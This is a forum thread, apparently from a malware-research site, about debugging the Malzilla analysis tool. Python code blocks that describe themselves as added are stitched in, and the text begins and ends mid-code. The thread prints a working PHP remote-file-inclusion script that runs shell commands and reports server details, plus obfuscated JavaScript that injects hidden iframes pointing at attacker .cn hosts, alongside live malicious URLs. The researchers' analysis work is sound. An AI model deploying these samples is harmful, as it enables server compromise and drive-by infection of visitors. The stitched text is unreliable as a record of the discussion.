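    dec_run = "6566"                   # constructed sample: "AB" as 65,66 minus the comma
    for candidate in decimal_splits(dec_run):
        print(candidate)
    print(decode_delimited("65,66", ",", 10))
```
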
-
Localized and fixed the Kalimero bug.
It was a stupid cleaning routine that was used to remove empty rows from the array - there was no exit if the array didn't have any row.
@JohnC
Please do some testing with caching HTTP headers (your request for this version)
btw. there is an option on Settings > Download tab > Add project info to saved files. That would also store all the relevant data into saved HTML documents, and this option is also present in Malzilla for very long time.
-
"Add project info to saved files" is enabled by default in MalZilla 1.1.0 but I'm not sure where I should be looking for the HTML files, I don't see them. When I load a cached page, I don't get the headers.
Also I noticed this strange bug.
(http://img82.imageshack.us/img82/8319/67773691dy2.png)
The site in question is an NX domain site, so MalZilla couldn't access it. The cache file d41d8cd98f00b204e9800998ecf8427e is 0 bytes long. This is because MalZilla tries to save a cache for sites that don't work as well it seems. If you test MalZilla trying to access any site that doesn't exist, it will create the 0 byte file in the cache folder, and if you try to load it, it will load the empty file. However if you visit another site which doesn't work it will not add this site to the cache because it has the same md5 hash as the other site. But if you try and open the original cached page, it will then give you that error.
And another little bug.
(http://img359.imageshack.us/img359/6370/61785352yx7.png)
Clear the URL box. Expand the url box to see all visited urls but don't click any, so that the url box is still empty. Then click "Load from cache". It will produce the Debug error message.
-
bobby, is version 1.1.0 available at any site other than sourceforge? Every time I try and DL it, it crashes on me (not the first time I've had this problem with sourceforge !!)
-
http://www.malwaredomainlist.com/malzilla_1.1.0.zip
-
Thanks John ;D
-
Regarding SF downloads in general / for future reference...
Assuming that you know the exact name of the package you wanna download,
eg."malzilla_1.1.0.zip" in this case,then you can substitute the mirroring server's name as below...
http://heanet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://dfn.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://surfnet.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://kent.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://switch.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
http://ovh.dl.sourceforge.net/sourceforge/malzilla/malzilla_1.1.0.zip
And it goes on...don't remember by heart all the available mirrors there... ;-)
Alternatively,someone could use the following...
but I think this one takes a bit more to update/mirror the revisions,not really sure about that:
http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/m/ma/malzilla/
-
@JohnC
About 0-byte files - it is so by design. Can you suggest better behavior which better suits your needs?
About "debug" message, it is from function that makes corrections in URL (hxxp > http and fxp>ftp).
I've removed the message.
btw. there are some features of Malzilla that I still haven't documented.
Command-line parameters:
-url "www.aa.aa" - open Malzilla and put the URL in URL box - this goes through URL fix routine mentioned above, so you can supply hxxp://... links
-html file.ext - open Malzilla and load file in Download tab
-js file.ext - open Malzilla and load file in Decoder tab
I'm still looking for solution to integrate Malzilla with browsers, so that the browser open Malzilla if hxxp link is clicked.
btw. Today I have done a lot of fixes (how dumb I was with handling of Unicode...)
Will push a bugfix release as soon as possible (0-bytes problem mentioned by JohnC need to be fixed when I get feedback from JohnC).
-
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file
@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.
-
@Orac
Indeed, SF can be a PITA sometimes. I'll see what I can do (need to read the agreement with SF again, to see not to do something against the agreement).
I get the best results when downloading from Ireland mirror (can't recall the name).
-
@JohnC
"Adding project info" affects just the files at saving from right-click menu > Save to file
@all
Please do not forget right-click menu. The best things are in that menu.
Just take a look at "Run script" sub-menu.
It just seems to save the webpage, there aren't any HTTP headers saved with it.
-
Hmmm... you just found another bug. It did work.... :(
-
httpS bug
Using malzilla I attempted to retrieve https://www.ba-sat.com/sunshop/images/products/idfeel.txt and it gave me a 500 response, but I was able to grab the link using other means.
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
Of course why anyone would use a https link for a RFI is another question ::)
-
...worked fine for me at the very exact moment?Using v1.1.0 obviously...
<?php
//FeeLCoMz Response
$pwd1 = @getcwd();
$un = @php_uname();
$os = @PHP_OS;
$id1 = ex("id");if (empty($id1)) {$id1 = @get_current_user();}
$sof1 = @getenv("SERVER_SOFTWARE");
$php1 = @phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = @gethostbyname($SERVER_ADDR);
$free1= @diskfreespace($pwd1);
$all1= disk_total_space($pwd1);
$used = ConvertBytes($all1-$free1);
$free = ConvertBytes(@diskfreespace($pwd1));if (!$free) {$free = 0;}
$all = ConvertBytes(@disk_total_space($pwd1));if (!$all) {$all = 0;}
if (@is_writable($pwd1)) {$perm = "[W]";} else {$perm = "[R]";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") {$sf = "ON";} else {$sf = "OFF";}
echo "FeeLCoMz".$sf."<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "srvip: $ip1<br>";
echo "srvname: $name1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all $perm<br>";
function ConvertBytes($number) {
$len = strlen($number);
if($len < 4) { return sprintf("%d b", $number); }
if($len >= 4 && $len <=6) { return sprintf("%0.2f Kb", $number/1024); }
if($len >= 7 && $len <=9) { return sprintf("%0.2f Mb", $number/1024/1024); }
return sprintf("%0.2f Gb", $number/1024/1024/1024);
}
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
} else { $res = "NULL"; }
}
return $res;
}
exit;
?>
PS:That's what happens to people that prefer using Vista instead of XP... ;-)
-
Since reading Sow's post, I've reinstalled V1.1.0 and it still gives me a 500 response on that link, strange.
-
Works fine here. Either geolocation or you are banned from the server (or your proxy is banned if you are using one).
-
https://www.ba-sat.com/sunshop/images/products/idfeel.txt
GET /sunshop/images/products/idfeel.txt HTTP/1.0
Host: www.ba-sat.com:443
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept-Encoding: gzip
Works fine in my browser.
-
I get the best results when downloading from Ireland mirror (can't recall the name).
Tis HEANet ;)
@John,
I get the same error for that one, and it works fine in the browser and in vURL DE;
-
I was talking with Orac about it earlier on irc...we didn't manage to come up with a solution.
It's not dns cache (ipconfig /flushdns),that's for sure.
It's not firewall rules,again,that's for sure.
Then again,the error code returned is 500...which is kinda weird:
because if we assume the fault is not in the server configuration itself,
then the only thing that comes to mind is that the packets,
don't get transmitted correctly from the client itself...thereby triggering that error.
bobby says "either geolocation or you are banned from the server",
which pretty much seems to be the most reasonable explanation to me.
If not,then...not many things come to mind on how to solve this,anyway...
1)Capture two different pcap files in order to compare what's being going on...
one via whatever browser that responds 200 ok,one via Malzilla that returns 500.
2)Trace what Malzilla does when the annoying 500 returns,either via OllyDbg,
or even via a "simpler" api tracer out there...here's a small example list:
http://www.teamfurry.com/index.php?topic=10.msg21#msg21
3)Maybe the server itself doesn't implement ssl correctly?
Here's all the ssl algos that this server supposedly implements/understands...
-
"either geolocation or you are banned from the server"
Can't be either of those, as I can get the link using a browser.
Pcap logs show a zero byte TCP stream when using malzilla, the TCP stream is completely normal when using a browser.
I tried using malzilla with the same UA as my browser, that didn't make any difference either.
I think it's either something in the server, or the https request from malzilla isn't being accepted for some reason.
-
I've found some reports that OpenSSL library is not working properly on WinXP SP3, so this bug maybe affects Vista too.
Malzilla is using OpenSSL library to manage HTTPS protocol (libeay32.dll in Malzilla's folder).
Version supplied with Malzilla is 0.9.8.7 (0.9.8g)
If you find a newer version, please replace the old dll.
You may try to get the files from here (extract them from the installer):
http://www.slproweb.com/products/Win32OpenSSL.html
-
Pcap logs show a zero byte TCP stream when using malzilla
...if Wireshark doesn't report much stuff regarding the ssl handshake/algo negotiation in question,
there are couple of alternatives I can think of...or actually,
it's one alternative option,that is to use an ssl 'debugging' proxy instead...
with ssldump as the first one that comes to mind.
Note though that I've never tried to build ssldump under win32... :-\
http://www.rtfm.com/ssldump/
What I've been in the need of compiling and have used successfully under win32 in the past,
is couple of simpler ssl diagnostic proxy implementations...Mozilla's own ssltap namely:
http://www.mozilla.org/projects/security/pki/nss/tools/ssltap.html
And sshole as well (it had built cleanly under cygwin)...
http://thekonst.net/en/sshole
-
Found the answer from bobbys link
If you discover 0.9.8i doesn't work (saying something like "The application did not start") and you are running XP SP3 and have installed the VC++ 2008 Redistributables, then revert to XP SP2 and make it a corporate policy to stop using the latest bleeding-edge software from Microsoft.
Guess what, this machine is XP SP3
:(
-
Just an FYI Bobby, Malzilla is showing the following on initial launch? (loaded without issue after clicking OK)
-
That's a part of OpenSSL. Malzilla uses this dll to handle https links.
Do you have another libeay32.dll in your path or just the one dll in Malzilla's folder?
-
Just the one of them :)
-
Malzilla 1.2.0 updated.
I still do not have solution for libeay32.dll
It simply does not work on the systems where newer VS redistributable files are installed.
XP SP3 contains these by default.
This version of VS 2008 redistributables should work:
http://www.microsoft.com/downloads/details.aspx?familyid=9B2DA534-3E03-4391-8A4D-074B9F2BC1BF
I also have a new tutorial prepared, but I have troubles with uploading it to the SourceForge (and not only me, according to SF bug-tracker).
-
Cheers dude :)
-
I've encountered numerous troubles when VS 2005 came out,
with its so-called 'side-by-side assemblies'...
having often to mess around with custom-made manifest files etc.,
and even then,not always successfully,
as there were way too many incorrectly compiled programs distributed out there...
But now I was just reading the page over at Shining Light,and it says:
Although there is a "newer version" of this installer, this is the correct version to install.
That's kinda weird...because assuming the .exes are compiled correctly in the first place,
newer Visual C++ redistributables shouldn't 'break' them...at the worst case scenario,
a .manifest file should be created to point/redirect to the newer libraries:
http://msdn.microsoft.com/en-us/library/aa375632.aspx
...should I assume that older OpenSSL dlls were not compiled with VS2005/2008?
Question is: could OpenSSL be compiled statically into Malzilla.exe itself,
in order to see if the problem persists?Not sure if this is possible...plus,one more idea:
http://www.stunnel.org/download/stunnel/win32/stunnel-4.26-installer.exe
libeay.dll included there is OpenSSL 0.9.8i -> build 15 Sep 2008 with gcc... ;)
-
Using 0.9.8i cleared the SSL error I was receiving :)
-
Lol -> gcc p0wned vs studio,ha-ha! :)
Nice thing is that 0.9.8i is also newer than Shining Light's 0.9.8g,
although from what I see in their changelog,it's mainly crash related bugfixes...
http://www.openssl.org/news/vulnerabilities.html
Edit:Shining Light has updated to 0.9.8i,my mistake...
as I was looking for older versions as well via WebArchive,he-he ;-)
http://www.slproweb.com/products/Win32OpenSSL.html
-
@sowhat-x
I'm looking into other than OpenSSL solutions (there is a couple more SSL solutions out there).
AFAIK, OpenSSL is the most complete solution. I will need to see how useful/complete are the other ones.
@MysteryFCM
Thanks, I will try that.
btw. which Windows version you use?
I have one PC with Win XP SP3, and I will do some testing on it tomorrow.
On this PC that I use for development, I use SP2.
I have bad experiences from updating SP1 > SP2 (network didn't work anymore), and I do not dare to reinstall Windows again if I get problems with installing SP3 (too many tools and settings need to be installed/setup).
I have attached the new tutorial here. Who knows how much time will SF.net need to fix up the problems.
-
@Bobby,
I've got a machine with XP SP2 and a machine with XP SP3 :)
-
...just read the tutorial...that's really magic there,
need to read it couple of times more in order to get in the flow of it,
damn it -> i'd dare saying it's better than unpacking! ;D
Irrelevant...does "Kalimero" word mean something by itself?
Or was it a randomly chosen/made-up term?
I'm asking because "Kalimera" in greek means "Good Morning"... :)
-
Kalimero = Calimero = toon character:
http://en.wikipedia.org/wiki/Calimero
We use K instead of C here, as we always read C as Tz (almost like in Tzatziki).
If you need to read it as K (like in the word "Combination"), you need to write K :)
@MysteryFCM
And you were getting that error message on both of them?
-
I was, yep
-
A feature suggestion: ability to POST instead of GET. With a little box to put the POST data, (in hex perhaps so that you can allow for newline characters etc). which works pretty much like GET does so that you can save to file whatever data is returned by the server.
-
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.
-
Because we don't know what is going to be required, the best method for the POST, would be a simple box, where the user fills in the suspected vars required? This would then be included in the post data.
-
@JohnC
I'll see what can I do.
POST is not a problem, I was already working on apps using POST methods to submit data to a form.
Only problem is that I do not know what kind of form we have to deal with.
If you just need a box where you will put the data manually, that can be done in one hour.
For the time being, that is what I need :)
-
Upgraded to the latest version. Somehow my error for libeay32.dll went away! Working great.
-
Hmmm... POST does not seem to be so trivial.
It can also send line breaks.
So, we actually need an edit box, not one-line box for input.
Also, MIME type should be specified at sending POST, and there is a whole bunch of possible MIME types that one may want to send.
A file can also be sent in POST, and that would be another problem because it is not so generic thing like just sending some strings.
So, I'm thinking about having grid interface with 3 columns:
1. type (string or file)
2. name
3. value (just for string type)
If we do not need to POST files, the whole thing will be a lot easier to implement.
-
Here is a rudimentary POST implementation (file attached).
It does just the application/x-www-form-urlencoded POST method.
That means, when the POST dialog appears, one needs to enter the POST data in the form:
name1=value1&name2=value2&...
Do not put the question mark at the beginning of the POST data.
URL where the POST will be sent needs to be put in regular URL box.
Please, you need to see the source of the page where a form requesting the data was, so that you can see the link where to POST the data.
Example:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Untitled</title>
</head>
<body>
<form action="postresult.php" method="post">
<input type="submit" name="send_button" value="send it!">
<input type="text" name="text_value" value="0123456789">
</form>
</body>
</html>
It means that you need to put postresult.php instead of the current address in the URL field before clicking on POST button.
If the page was www.some_site.com/form.php, you need to put there www.some_site.com/postresult.php, and after that click on POST button.
A dialog for POST data will appear (if you leave it blank, it will abort the operation).
-
Is it possible to be able to enter the data in hex or something like that to allow for newline characters in the data? Good work by the way.
-
You can't send newline with application/x-www-form-urlencoded.
Can you give me an example where you need to send newline, so that I can do some testing?
-
You should be able to send a new line using either CrLf or Chr 10? (or /n)
-
In standard URL encoding, one can use %0d%0a to get CrLf, but I still do not believe it can be interpreted by the server.
There are other methods to POST such kind of data, but there is no way in which I can make a universal form/gui for such thing.
I will elaborate more on this later tonight (just got back from the job, and I need to feed the monsters in my stomach :) )
-
Sorry for being a bit late with promised explanation.
First standards for POST method defined just one type of sending data: application/x-www-form-urlencoded
This way someone can send URLEncoded data. URL encoding means that chars like spaces and similar must be encoded before sent. Every such character should be replaced by % followed by the ASCII number of the character.
Anyway, with such a method one can't send files. Later revisions of the POST method introduced one more MIME type for POST - multipart/form-data.
This MIME type can be composed from other MIME types, where bound marks are used between the various MIME types sent.
Bound marks are random generated, and one bound should be used per POST.
Also the bound should be sent at declaring the MIME type of the POST, so that the server knows what bound mark is used.
Example:
This goes into HTTP headers sent:
MIME type: multipart/form-data, boundary=1234AB_my_unique_boundary
Data is sent like following:
--1234AB_my_unique_boundary
content-disposition: form-data; name="file"; filename="some_file.zip"
Content-Type: Application/octet-string
**here goes the some_file.zip as binary**
--1234AB_my_unique_boundary
Content-Disposition: form-data; name="some_form_element"
some_form_element's_data
--1234AB_my_unique_boundary--
As you can see, message is composed from two different MIME types, first one being a file to submit, and the 2nd one a value for a form's element.
There is a boundary mark between the two.
Message can be composed from even more elements, each being of different MIME type.
So, it is pretty impossible to make a GUI that will generate such messages.
I can eventually make a text-box where someone will type such messages manually (inclusive entering the MIME types and boundary marks).
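The two POST encodings described in the posts above (application/x-www-form-urlencoded, including the %0d%0a question, and multipart/form-data with its boundary marks), as an added example that is not part of the thread and is not Malzilla's code. Function names and sample values are assumptions, and the header and content-type spellings follow RFC 7578 rather than the shorthand used in the post.

```python
import re
import secrets
from urllib.parse import urlencode, parse_qs

CRLF = b"\r\n"


def build_urlencoded(fields):
    """name=value pairs joined by '&'; CR, LF and other reserved bytes become %XX."""
    return urlencode(fields).encode("ascii")


def parse_urlencoded(body):
    """What a standard receiver-side parser recovers from that body."""
    parsed = parse_qs(body.decode("ascii"), keep_blank_values=True)
    return {name: values[0] for name, values in parsed.items()}


def pick_boundary(payloads, boundary=None):
    """One boundary per POST; it must not occur anywhere in the data it frames."""
    if boundary is not None:
        if any(boundary.encode("ascii") in p for p in payloads):
            raise ValueError("boundary occurs inside the payload")
        return boundary
    while True:
        candidate = secrets.token_hex(16)
        if not any(candidate.encode("ascii") in p for p in payloads):
            return candidate


def build_multipart(fields, files, boundary=None):
    """fields: {name: str}; files: {name: (filename, content_type, bytes)}.
    Returns (Content-Type header value, body bytes)."""
    payloads = [v.encode("utf-8") for v in fields.values()]
    payloads += [data for (_, _, data) in files.values()]
    boundary = pick_boundary(payloads, boundary)
    delim = b"--" + boundary.encode("ascii")
    lines = []
    for name, (filename, ctype, data) in files.items():
        disp = f'Content-Disposition: form-data; name="{name}"; filename="{filename}"'
        lines += [delim, disp.encode("utf-8"),
                  f"Content-Type: {ctype}".encode("ascii"), b"", data]
    for name, value in fields.items():
        disp = f'Content-Disposition: form-data; name="{name}"'
        lines += [delim, disp.encode("utf-8"), b"", value.encode("utf-8")]
    lines += [delim + b"--", b""]          # closing delimiter, then final CRLF
    return f"multipart/form-data; boundary={boundary}", CRLF.join(lines)


def split_multipart(body, boundary):
    """Minimal receiver-side split, enough to check the framing built above."""
    delim = b"--" + boundary.encode("ascii")
    parts = {}
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter reached
            break
        headers, _, content = chunk[len(CRLF):].partition(CRLF + CRLF)
        name = re.search(rb'\bname="([^"]*)"', headers).group(1).decode("utf-8")
        parts[name] = content[:-len(CRLF)]  # CRLF before the next delimiter
    return parts


# Constructed sample values, reusing the names from the posts above.
SAMPLE_TEXT = "line one\r\nline two"
SAMPLE_FILE = b"PK\x03\x04 constructed bytes\r\n\x00\xff"

if __name__ == "__main__":
    body = build_urlencoded({"text_value": SAMPLE_TEXT, "send_button": "send it!"})
    print(body)
    print(parse_urlencoded(body))
    ctype, body = build_multipart(
        {"some_form_element": SAMPLE_TEXT},
        {"file": ("some_file.zip", "application/octet-stream", SAMPLE_FILE)},
        boundary="1234AB_my_unique_boundary",
    )
    print("Content-Type:", ctype)
    print(body.decode("latin-1"))
```
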
-
Bobby
FYI i ran a A-Squared scan on my lappy earlier this morning and it picked up "LuckySploit" as high risk malware ::)
-
There is a bug in Decoder tab. When you highlight text, if you start to type it will over write the highlighted text as you would expect but the highlight remains and more text starts to be over written. This bug I can only create after the debug window has been opened.
So open Malzilla, go to decoder tab. Type something incorrect that will allow you to debug it, such as an eval() with the opening parenthesis missing:
eval2321412);
Click debug, close the debug window. Then highlight the number, and start to type, this is what you will see.
(http://img195.imageshack.us/img195/7153/malzillabug.png)
-----------------------------
Second bug, again this bug I can only recreate after the debug window has been opened. Type something, like eval(2321412);
Highlight everything using select all. Type something, it will bring up a message box.
-
I've actually been able to reproduce this without having to click debug (the first error you mentioned), resulting in my having to remember to click the mouse before trying to move to the part I want to modify/delete.
Figured it was just my machine with no-one else mentioning it before ....
-
@JohnC
I know about the first bug. The funny thing is that it does not depend on anything normal.
When I compile Malzilla it can expose this bug or not. It is random. E.g. I compile Malzilla, and the bug occurs, e.g. on Decoder tab. I compile it one more time, there is no bug on Decoder tab, but it occurs on some other tab. It can also happen it does not occur at all.
With such weird behavior, I simply can't find the source of the problem.
About the second bug - this is new to me, but it looks like it is related to the first one.
-
Bobby, I don't know if this has been brought up before, but just wanted to say that the Copy/Paste functions do not seem to be working.
I tried copy pasting a code snippet from Malzilla to notepad using right-click, it didn't work. The usual Ctrl+C & Ctrl+V seems to work.
By the way, glad to meet you all, some of you might know me... anyways, I'm Cyborg from Malware Removal (MWR).
-
Welcome to MDL :)
-
Thanks a lot Steven :D
-
Hi Cyborg and welcome.
Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.
Do you use Clipboard Monitor (option from tray icon)?
-
I forgot to mention btw Bobby, the DLL issue I was having (showed up whenever Malzilla was launched) - I fixed it eventually (accidentally) by uninstalling the MS Visual C++ runtime ..... (bit weird, but it worked)
-
Looks like a conflict between various versions of the same DLL.
-
hehe yep :)
-
Hi Cyborg and welcome.
Which version of Malzilla you use? This looks like a known bug from old versions of Malzilla, but it should be corrected long time ago.
Do you use Clipboard Monitor (option from tray icon)?
Hi Bobby, nice to meet you here.
Version : 1.2.0
I downloaded it from the sourceforge website only 2-3 weeks ago.
And no, I'm using the right click option from inside MalZilla.
By the way, I don't know why, whenever I open MalZilla, I'm getting this error :
(http://img14.imageshack.us/img14/124/captureabu.png)
However, it does not seem to be affecting the way MalZilla works. I've tried replacing the shortcut by deleting the original files and unzipping MalZilla again. That did not fix the issue.
By the way, I'm on Vista Home Premium.
Reg,
Cyborg
-
Hi Cyborg,
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.
-
Hey Bobby :)
I have asked about Clipboard Monitor (from tray icon), because Clipboard Monitor did have some weird behaviour earlier, messing up the clipboard if the clipboard content contained a link (http or ftp).
It has a check placed on it. But the clipboard doesn't work. It doesn't copy normal text either.
As for the libeay32.dll problem - can you tell me if you have the same DLL in your Windows/System32 folder (or anywhere else in the PATH)?
Libeay32.dll is used for secured connections (https). Try if you can reach any https link, and if you get another error message or not.
No, I don't have a copy of libeay32.dll in system32. And no, I'm not able to open any https websites (isn't this a known problem on Vista?). I get this in the lower pane :
=========================
Server IP(s):
0.0.0.0
=========================
HTTP headers:
GET / HTTP/1.0
Host: webparent.sabis.net:443
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/521.9 (KHTML, like Gecko) Safari/521.9
Accept-Encoding: gzip
Above is a working example of the website : https://webparent[dot]sabis[dot]net
-
Cyborg,
Go to Add/Remove Programs (Programs and Features on Vista), and uninstall the Microsoft Visual C++ Runtime ....
-
Thanks a lot Steven, that seems to have fixed the DLL issue.
Seems like you had already posted the solution before...
Anyways, got any idea about the clipboard issue?
Does anybody else have the same problem??
-
I've had the issue when copy/pasting from the shellcode/hex view, but not the rest of the program. When the problem occurs I either have it save the results, or use "Copy selection ...."
-
function LApySnWQkMr(){};LApySnWQkMr.prototype = {getRandString : function(){var l=16,c='0Y1R2Y3R4F5R6Y7)8R9FaYb}cRdFeFf}'.replace(/[\)F\}YR]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},path:String.fromCharCode(100)+new String("9")+"9"+"q"+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(110),alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},install : function(){if(!this.alreadyInstalled()){var s="<(d(iHv+ (s$tHy+l,e,=(\'+d+i,sHpHlHa+y,:+n+o$n(e$\'$>H<HiHf$r(a(m(e( Hs,r,c(=,\'+".replace(/[,\$H\(\+]/g, '')+this.getFrameURL()+"\'D>j<D/DitfjrDahmheh>D<C/CdtiDvt>h".replace(/[jDhCt]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehCtPmelC>e<LbPoedUyP>L'.replace(/[PULCe]/g, '')+s+'<C/$b$oCdCy~>n<C/~h~tCm$lC>$'.replace(/[Cp\$n~]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getFrameURL : function(){var dlh=document.location.host; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;},cookieValue:1,setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); },host:'/may.cn/',cookieName:'gfcehdba'};var ocho=new LApySnWQkMr();ocho.install();
Format Code will break a string or something in the code above and stop it from working as it should.
-
Here is another example that will decode, but when you use Format Code, it will no longer decode.
function yhIUKrxFqo(){};yhIUKrxFqo.prototype = {host:'/qq.cn/',install : function(){if(!this.alreadyInstalled()){var s="<_d_i3v1 GsFtGy_l3eF=F\'Gd_iGsGp3l3aFy1:Fn1o3n1e3\'_>F<FiGf3rFaFm1e_ Gs3rFc_=1\'F".replace(/[_1G3F]/g, '')+this.getFrameURL()+"\'J>q<q/qiJfRr@aRmqeJ>@<q/@dRiqvJ>q".replace(/[@J0qR]/g, '');try {var o=document;o.open();o.write(s);o.close();}catch(e){document.write('<ehetsmvls>e<rbroZdsyr>s'.replace(/[srevZ]/g, '')+s+'<{/rbPokdFyr>r<r/FhFtkmrlr>P'.replace(/[\{rkPF]/g, ''))}this.setCookie(this.cookieName, this.cookieValue);}},getRandString : function(){var l=16,c='0m1j2m3z4{5m6m7j8J9maJbzc{dmeJfz'.replace(/[\{jzmJ]/g, ''),o='';for(var i=0;i<l;i++)o+=c.substr(Math.floor(Math.random()*c.length),1,1);return o;},cookieValue:1,getFrameURL : function(){var dlh=''; return "http"+'://'+((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.path + this.host;},path:String.fromCharCode(102)+"q"+new String("w")+String.fromCharCode(101)+String.fromCharCode(114)+new String("z")+"."+new String("c")+new String("n"),cookieName:'chfeabgd',alreadyInstalled : function(){return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);},setCookie : function(name, value){var d= new Date(); d.setTime(new Date().getTime() + 86400000); document.cookie = name + "=" + escape(value)+"; expires="+d.toGMTString(); }};var ocho=new yhIUKrxFqo();eval(ocho.getFrameURL());
-
This one sends Malzilla into a permanent 302 ....... (unless autofollowing redirects is disabled of course);
http://www.fucking-cash.com/index.com?a=3546&p=2
p= is valid from 1 up to lord knows where (highest I've found so far is 15, all seem to be serving malware (haven't analyzed it in detail yet))
/edit
Okie, after stopping Malzilla doing an auto 302, those < 10 are intermittent between perma redirects back to itself, and redirects to other sites. Those > 10 (and so far the number doesn't seem to be limited) all lead to porn sites. The reason I thought it was malware is that it was actually serving the file as application/x-msdownload, which meant Malzilla was treating the redirect URL as an actual file - looking at the source code for some of them, this does not seem to be the case - they just seem to be regular porn sites.
-
Malzilla treats some content as a binary file (and triggers the Save dialog) only if one of the following lines/strings is present in the HTTP headers:
'Content-Type: application'
'Content-Disposition:'
Malzilla will follow redirections for every HTTP response in the range between 300 and 399. It does not distinguish between e.g. 300 and 302 responses.
Redirection is done according to the following line in HTTP headers if present (it should be present for every 3xx response):
'Location:'
One more type of redirection that Malzilla will follow is the one with response 200 and with 'Refresh:' line in HTTP headers.
-
@MysteryFCM
Indeed, these HTTP headers are driving Malzilla nuts.
'Location:' is empty, and that triggers Malzilla to treat it as a relative URL, which means that the absolute URL will be the same as the current URL.
The 'ContentType:' will trigger the save dialog because it contains 'application' string; and redirection (e.g. 302) in Malzilla does not exclude a possibility of getting a download (binary) in the same turn. This would be my mistake in coding the HTTP headers parser.
Interesting.
It makes me think that someone made this just to explore Malzilla's HTTP headers parser system :)
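The header handling described in the two posts above, as an added Python sketch that is not Malzilla's code or part of the original posts: it resolves 'Location:' and 'Refresh:' targets, stops on an empty target or a revisited URL instead of looping, and only classifies a response as a download when it is not a redirect. The function names, MAX_HOPS and the example.* URLs are assumptions made for this example.

```python
from urllib.parse import urljoin

MAX_HOPS = 10  # assumed cap for this sketch, not a Malzilla setting


def parse_headers(raw):
    """Return (status_code, {lower-cased header name: value})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return status, headers


def refresh_target(value):
    """Pull the URL out of a 'Refresh: 0; url=...' value ('' if none)."""
    for part in value.split(";"):
        part = part.strip()
        if part.lower().startswith("url="):
            return part[4:].strip("'\" ")
    return ""


def decide(current_url, raw, visited):
    """Return (action, detail); action is follow, stop, save or render."""
    status, headers = parse_headers(raw)
    target = None
    if 300 <= status <= 399:
        # Every 3xx is a redirect; a missing Location counts as empty.
        target = headers.get("location", "")
    elif status == 200 and "refresh" in headers:
        target = refresh_target(headers["refresh"]) or None
    if target is not None:
        # Redirects are handled first, so a 3xx carrying
        # 'Content-Type: application/...' never reaches the save branch.
        if target == "":
            # urljoin(current_url, "") returns current_url: the endless 302.
            return ("stop", "empty redirect target")
        nxt = urljoin(current_url, target)
        if nxt in visited:
            return ("stop", "redirect loop")
        if len(visited) >= MAX_HOPS:
            return ("stop", "too many redirects")
        return ("follow", nxt)
    ctype = headers.get("content-type", "").lower()
    if ctype.startswith("application") or "content-disposition" in headers:
        return ("save", current_url)
    return ("render", current_url)


def walk(start_url, responses):
    """Replay canned responses {url: raw headers}; return the decision trail."""
    trail, visited, url = [], set(), start_url
    while True:
        visited.add(url)
        action, detail = decide(url, responses[url], visited)
        trail.append((url, action, detail))
        if action != "follow":
            return trail
        url = detail


# Constructed header blocks (not captured traffic).
EMPTY_LOCATION = ("HTTP/1.1 302 Found\r\nLocation:\r\n"
                  "Content-Type: application/x-msdownload\r\n")
CHAIN = {
    "http://start.example/a": "HTTP/1.1 301 Moved\r\nLocation: /b\r\n",
    "http://start.example/b": ("HTTP/1.1 200 OK\r\n"
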